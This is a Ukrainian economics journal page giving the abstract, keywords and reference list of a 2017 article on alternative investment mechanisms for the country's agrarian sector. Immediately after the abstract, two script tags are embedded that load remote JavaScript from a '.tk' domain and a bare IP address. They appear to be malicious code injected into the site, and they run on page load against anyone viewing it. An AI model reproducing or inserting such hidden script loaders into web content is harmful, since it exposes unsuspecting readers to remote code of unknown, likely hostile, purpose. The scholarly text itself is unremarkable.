ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.322:338.434
Фінансові відносини та бухгалтерський облік

Методологічні засади формування альтернативних механізмів інвестування аграрного сектору економіки України / Єрмаков О.Ю., Новак І.М. // Економіка АПК. - 2017. - № 8 - С. 48

Мета статті - дослідити процес інвестування аграрного сектору економіки України та сформувати альтернативні механізми залучення фінансових ресурсів. У процесі дослідження використовували методи: аналіз, синтез, наукова абстракція (при уточненні категоріально-понятійного апарату дослідження); порівняльний і статистичний аналіз, логічне узагальнення та групування (при аналізі джерел фінансування капітальних інвестицій у країні й ефективності фінансового забезпечення аграрних підприємств); системно-структурний аналіз (при формуванні консолідованого джерела інвестування аграрної галузі); структурної декомпозиції (при розподілі функцій і завдань у механізмі інвестиційних взаємовідносин аграрних товаровиробників з інститутами спільного інвестування). Як елемент наукової новизни запропоновано використовувати активи інститутів спільного інвестування при формуванні консолідованого джерела інвестування аграрної галузі. Даний механізм інвестування аграрного сектору економіки рекомендовано реалізувати за трьома напрямами: залучення капіталу венчурних фондів через акції аграрних підприємств; інвестування капіталу індивідуальних інвесторів (бізнес-ангелів); залучення капіталу під заставу документів аграрних виробників. Рекомендовано запровадити комплекс заходів у галузі права, податкової, фінансово-кредитної політики. У перспективі ефективне використання капіталу страхових компаній, недержавних пенсійних фондів, інститутів спільного інвестування та інших учасників ринку небанківських фінансових послуг аграрними товаровиробниками сприятиме мінімізації ризиків діяльності господарюючих структур, подоланню проблеми дефіциту фінансових ресурсів, розширенню можливостей інноваційного зростання. Табл.: 1. Рис.: 3. Бібліогр.: 37.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: альтернативні механізми, аграрний сектор, інвестиції, інститути спільного інвестування, стратегія, венчурне інвестування, бізнес-ангели

Список використаних джерел

 1. Більський І.Д. Особливості процесу розроблення інвестиційної стратегії аграрного виробництва / І.Д. Більський, Р.П. Дудяк // Наук. вісн. Нац. лісотехнічного ун-ту України : зб. наук. праць. - Львів. НЛТУУ. - 2008. - Вип. 18.(3). - С. 192-197.
 2. Бланк І.О. Інвестиційний менеджмент : підруч. / І.О. Бланк, Н.М. Гуляєва. - К. : Київ. нац. торг.-екон. ун-т, 2003. - 398 с.
 3. Blanchard O., Fischer S. (1989). Lectures on Macroeconomics. The MIT Press, Cambridge.
 4. Вартість основних засобів у 2000-2015 рр. // Державна служба статистики, 2016 р. [Електронний ресурс] - Режим доступу : http://www.ukrstat.gov.ua.
 5. Galbraith J.K. The New Industrial State. - Houghton Mifflin Company, Boston, 1967. - Pp. xiv, 427.
 6. Губський Б.В. Інвестиційні процеси в глобальному середовищі / Б.В. Губський. - К.: Наук. думка, 1998. - 390 с.
 7. Денисенко М.П. Організаційно-економічний механізм інвестування: моногр. / М.П. Денисенко. - К.: Науковий світ, 2001. - 414 с., с. 13.
 8. Директива Ради 2006/112/ЄС про спільну систему податку на додану вартість. [Електронний ресурс] - Режим доступу : http://zakon3.rada.gov.ua/laws/show/994_928.
 9. Єрмаков О.Ю. Ефективність інвестицій в садівництво : моногр. / О.Ю. Єрмаков, М.І. Кісіль, В.І. Чорнодон. - Тернопіль: Крок, 2011. - 234 с.
 10. Закон України «Про внесення змін до Податкового кодексу України та деяких законодавчих актів України щодо забезпечення збалансованості бюджетних надходжень у 2017 році» // Відом. Верхов. Ради України (ВВР). - 2017. - № 4. - Ст. 42.
 11. Закон України «Про Державний бюджет України на 2012 рік» // Відом. Верхов. Ради України (ВВР). - 2012. - № 34-35. - Ст. 414.
 12. Закон України «Про Державний бюджет України на 2013 рік» // Відом. Верхов. Ради України (ВВР). - 2013. - № 5-6. - Ст. 60.
 13. Закон України «Про державний бюджет України на 2014 р.» № 719-VII від 16.01.2014 р. // Відом. Верхов. Ради України (ВВР). - 2014. - № 9. - Ст. 93. [Електронний ресурс] - Режим доступу : http://zakon0.rada.gov.ua/laws/show/719-18.
 14. Закон України «Про державний бюджет України на 2015 р.» № 80-VIII від 28.12.2014 // Відом. Верхов. Ради України (ВВР). - 2015. - № 5. - Ст. 37. [Електронний ресурс] - Режим доступу : http://zakon0.rada.gov.ua/laws/show/80-19.
 15. Закон України «Про Державний бюджет України на 2016 рік» Відом. Верхов. Ради України (ВВР). - 2016. - № 5. - Ст. 54.
 16. Зовнішньоекономічна діяльність України 2015 р. / Державна служба статистики України [Електронний ресурс] - Режим доступу : http://www.ukrstat.gov.ua.
 17. Закон України «Про державний бюджет України на 2011 р.» № 2857-VI від 23.12.2010 р. // Відом. Верхов. Ради України (ВВР). - 2011. - № 7-8. - Ст. 52 [Електронний ресурс] - Режим доступу : http://zakon2.rada.gov.ua/laws/show/2857-17.
 18. «Капітальні інвестиції в Україні у 2010-2015 рр.» // Державна служба статистики України, 2016 р. [Електронний ресурс] - Режим доступу : http://www.ukrstat.gov.ua.
 19. «Капітальні інвестиції в Україні за 2016 р.» // Державна служба статистики України, 2017 р. [Електронний ресурс] - Режим доступу : http://www.ukrstat.gov.ua.
 20. Кісіль М.І. Пріоритети інвестування розвитку аграрного сектору економіки України в умовах військових подій / І.М. Кісіль // Економіка та управління АПК. - 2015. - № 1 [Електронний ресурс] - Режим доступу : http://econommeneg.net.ua/sites/default/files/visnyky/economika/kisil.pdf.
 21. Красовская О. Венчурный капитал: ошибки в трактовании и состоянии дел в Украине / О. Красовская, В. Грига // Економіст. - 2007. - № 9. - С. 75-77.
 22. Machlup F. (1965). International Trade and the National Income Multiplier. Philodelphia: Blakiston; reprinted 1965 by Kelley, New York.
 23. Markowitz H.M. (1952). Portfolio Selection // Journal of Finance,7. - P. 77-91.
 24. Michael J. H., Dillard J., Williams R. The Debt Finance Landscape for US. Farming and Farm Businesses, USDA, ERS, 2009. - 12 р. - C. 7.
 25. Metzler L.A. (1973). Collected papers. Cambriddge, Mass., Harvard University Press.
 26. Мертенс А.В. Инвестиции / А.В. Мертенс. - К.: Киевское инвестиционное агентство, 1997. - 416 с.
 27. Мінагрополітики не підтримує ініціативи Мінфіну щодо скасування спецрежиму оподаткування ПДВ для аграріїв [Електронний ресурс]. - Режим доступу: http://minagro.gov.ua/node/17624384.
 28. Новак І.М. ТНК як сучасний регулятор міжнародного руху капіталу у вітчизняний аграрний сектор / І.М. Новак // Наук. вісн. Одеського нац. ун-ту. - 2016. - Т. 21. Вип. 7(49). - С.27-31.
 29. Новак І.М. Інноваційна спрямованість інвестиційного капіталу як напрям забезпечення конкурентоспроможності аграрної продукції на світовому ринку / І.М. Новак // Інноваційна економіка. - 2016. - №1-2 (61). - С. 38-43.
 30. Ohlin B. (1933). Interregoonal and International Trade. - Cambridge Mass.: Harvard University Press.
 31. Основні економічні показники виробництва продукції сільського господарства в сільськогосподарських підприємствах за 2014 рік. Стат. бюл. Державна служба статистики України. - К., 2015. - С. 84 [Електронний ресурс] - Режим доступу : http://www.ukrstat.gov.ua.
 32. Пересада А.А. Управління інвестиційним процесом / А.А. Пересада. - К.: Лібра, 2002. - 472 с.
 33. Henzler H. Shaping an International Investment Strategy. - The McKinsey Quarterly, Spring 1981.
 34. Розпорядження Кабінету Міністрів України «Про затвердження плану заходів з виконання Програми діяльності Кабінету Міністрів України та Стратегії сталого розвитку «Україна-2020» у 2015 році». № 213-р від 4 березня 2015 р. [Електронний ресурс] - Режим доступу : http://zakon2.rada.gov.ua/laws/show/213-2015-р.
 35. Удовиченко В.П. Зарубіжний досвід венчурного інвестування інвестиційно-інноваційної моделі розвитку аграрної економіки / В.П. Удовиченко // Український журнал прикладної економіки. - 2016. - Т. 1. - № 2. - С. 115-123.
 36. Федоренко В.Г. Інвестиційний менеджмент: навч. посіб. / В.Г. Федоренко. - К.: МАУП, 1999. - 184 с.
 37. Ястремська О.М. Інститут інвестування: економічна і соціальна природа функціонування / О.М. Ястремська // Наукові праці ДонНТУ. Серія: економічна. - 2010. - Вип. 38-1. - С. 423-435.

Читати статтю: e_apk_2017_8_8.pdf